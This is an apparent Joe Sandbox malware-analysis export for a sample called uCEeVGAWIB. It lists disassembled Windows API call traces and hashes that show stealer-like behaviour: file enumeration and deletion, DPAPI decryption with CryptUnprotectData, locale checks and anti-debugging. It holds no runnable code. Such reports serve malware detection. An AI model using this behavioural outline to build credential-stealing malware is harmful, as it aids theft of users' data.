                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                • String ID:
                                                • API String ID: 3334442632-0
                                                • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                • Instruction ID: 9be3760ad308608ca05c3e3a4db39a3ed6fb7552af44b6ea5e17d8eef135e64f
                                                • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                • Instruction Fuzzy Hash: 86B11071900228DBCB28EF64ED96AED7379FF55300F4041A9A50AD6152EF305B88CF93
                                                APIs
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425114,?,?,?,004251BC,?,?,00000000,?,00000000), ref: 00811B8A
                                                • StrCmpCA.SHLWAPI(?,00425264), ref: 00811BDA
                                                • StrCmpCA.SHLWAPI(?,0042530C), ref: 00811BF0
                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00811FA7
                                                • DeleteFileA.KERNEL32(00000000), ref: 00812031
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00812087
                                                • FindClose.KERNEL32(000000FF), ref: 00812099
                                                  • Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
                                                  • Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9
                                                  • Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
                                                  • Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
                                                  • Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                • String ID:
                                                • API String ID: 1415058207-0
                                                • Opcode ID: 30c097478159a8560779315bb3f44ea3a312a4c7821e37151fb7f80196eac8b7
                                                • Instruction ID: 99b2b18d167e06e1deda47b53fbc7400c24531e7be2afb1f8acc50d54f664445
                                                • Opcode Fuzzy Hash: 30c097478159a8560779315bb3f44ea3a312a4c7821e37151fb7f80196eac8b7
                                                • Instruction Fuzzy Hash: 4D12A671910228DBCF1DEB64ED96AEDB379FF54700F4045A9B10AA2091EF706BC8CE52
                                                APIs
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                  • Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
                                                  • Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
                                                  • Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 0081E0C5
                                                • StrCmpCA.SHLWAPI(?,004214C8), ref: 0081E115
                                                • StrCmpCA.SHLWAPI(?,004214CC), ref: 0081E12B
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0081E647
                                                • FindClose.KERNEL32(000000FF), ref: 0081E659
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                • String ID:
                                                • API String ID: 2325840235-0
                                                • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                • Instruction ID: 0c24cdda16b43807ba4be0fcca0c5572977338b6c04b9c073a53b8dcbf18822b
                                                • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                • Instruction Fuzzy Hash: 40F18B71910238DBCB1DEB64ED95AEEB379FF14700F4041DAA04AA2491EF346BC9CE52
                                                APIs
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                                • LocalFree.KERNEL32(00000000), ref: 00417D22
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                • String ID: /
                                                • API String ID: 3090951853-4001269591
                                                • Opcode ID: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                                • Opcode Fuzzy Hash: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                                APIs
                                                • memset.MSVCRT ref: 0081CABA
                                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0081CAD8
                                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0081CAE3
                                                • memcpy.MSVCRT(?,?,?), ref: 0081CB79
                                                • lstrcat.KERNEL32(?,00420B46), ref: 0081CBAA
                                                • lstrcat.KERNEL32(?,00420B47), ref: 0081CBBE
                                                • lstrcat.KERNEL32(?,00420B4E), ref: 0081CBDF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                • String ID:
                                                • API String ID: 1498829745-0
                                                • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                • Instruction ID: 1825b39ccc3f4b57cfb7175d0cc2150854e761d127a1e3d5959995f2d88bd720
                                                • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                • Instruction Fuzzy Hash: 0A415E7894421AEFDB10DFD4DC89BEEBBB8FF44704F1045A8E509A6280D7745A84CF95
                                                APIs
                                                • memset.MSVCRT ref: 0040C853
                                                • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00899AF0), ref: 0040C871
                                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                • String ID:
                                                • API String ID: 1498829745-0
                                                • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                                • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                                APIs
                                                • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,00899BA0,?,0042110C,?,00000000,?), ref: 0041696C
                                                • sscanf.NTDLL ref: 00416999
                                                • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,00899BA0,?,0042110C), ref: 004169B2
                                                • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00899BA0,?,0042110C), ref: 004169C0
                                                • ExitProcess.KERNEL32 ref: 004169DA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Time$System$File$ExitProcesssscanf
                                                • String ID: B
                                                • API String ID: 2533653975-2248957098
                                                • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                                • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                                APIs
                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: BinaryCryptLocalString$AllocFree
                                                • String ID: N@
                                                • API String ID: 4291131564-4229412743
                                                • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                                • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                                APIs
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00827E48
                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00827E60
                                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00827E74
                                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00827EC9
                                                • LocalFree.KERNEL32(00000000), ref: 00827F89
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                • String ID:
                                                • API String ID: 3090951853-0
                                                • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                • Instruction ID: 714e1f6ee7bdd6cc2612d103b2a366001a8587fcb931d2ca394d30172f8cc828
                                                • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                • Instruction Fuzzy Hash: D3412A71945228ABDB24DB94ED89BEDB3B8FF44704F204199E00AA2191DB342FC5CF92
                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 0082BE09
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0082BE1E
                                                • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0082BE29
                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0082BE45
                                                • TerminateProcess.KERNEL32(00000000), ref: 0082BE4C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                • String ID:
                                                • API String ID: 2579439406-0
                                                • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                • Instruction ID: 26d6543f775a692d52bfd90dc18062cb4cb91729140cc1a301dfe6fee66abe54
                                                • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                • Instruction Fuzzy Hash: A021C0BC9012159FDB10DF29F9896963BF4FB0A314F10403AE90A872A4EBB05981EF49
                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                                • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                                • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                • String ID:
                                                • API String ID: 2579439406-0
                                                • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                                • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 008174B4
                                                • RtlAllocateHeap.NTDLL(00000000), ref: 008174BB
                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008174E8
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 0081750B
                                                • LocalFree.KERNEL32(?), ref: 00817515
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                • String ID:
                                                • API String ID: 2609814428-0
                                                • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                • Instruction ID: 1048edc18589a4229b9e82c7a0e53a4093d6fb11eac649e0cfad006c6008aa65
                                                • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                • Instruction Fuzzy Hash: C4010075A84208BBEB10DFD4DD45F9D77B9EB44704F104159F705AA2C0D670AA008B65
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                                • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                • String ID:
                                                • API String ID: 3657800372-0
                                                • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                                • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00829885
                                                • Process32First.KERNEL32(00420ACA,00000128), ref: 00829899
                                                • Process32Next.KERNEL32(00420ACA,00000128), ref: 008298AE
                                                • StrCmpCA.SHLWAPI(?,00000000), ref: 008298C3
                                                • CloseHandle.KERNEL32(00420ACA), ref: 008298E1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 420147892-0
                                                • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                • Instruction ID: 7646754e423df8fb580bc04431266cc9fbdb3b3a711ffddad55da16669515ef3
                                                • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                • Instruction Fuzzy Hash: 38012979A40218FBCB20DFA4D854BEDB7F9FB0A300F044199E545E6240D7749A80CF51
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                                • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                                • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                                • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                                • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 420147892-0
                                                • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                                • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                                APIs
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                  • Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
                                                  • Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9
                                                  • Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
                                                  • Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
                                                  • Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 0081E709
                                                • StrCmpCA.SHLWAPI(?,004214F8), ref: 0081E759
                                                • StrCmpCA.SHLWAPI(?,004214FC), ref: 0081E76F
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0081EE46
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                • String ID:
                                                • API String ID: 433455689-0
                                                • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                                • Instruction ID: 39c100c3f4b0c15f3b494c7f4efee960258e086ced9d6d7e304a1d0775f5303d
                                                • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                                • Instruction Fuzzy Hash: 0512B871A102289BCB1CFB68ED96EED7379FF54700F4041A9B50AA6491EE345BC8CE53
                                                APIs
                                                • CryptBinaryToStringA.CRYPT32(00000000,008153EB,40000001,00000000,00000000,?,008153EB), ref: 00829127
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: BinaryCryptString
                                                • String ID:
                                                • API String ID: 80407269-0
                                                • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                • Instruction ID: b10a8ebb8eaa8a585cdc0f2e69fbe17914cdf703ea203ded1091a533ac3b4e66
                                                • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                • Instruction Fuzzy Hash: 2911DA74204209BFDB00CF95E889FA633AAFF89754F109558F949CB250D779E892DB60
                                                APIs
                                                • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: BinaryCryptString
                                                • String ID:
                                                • API String ID: 80407269-0
                                                • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                                • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                                APIs
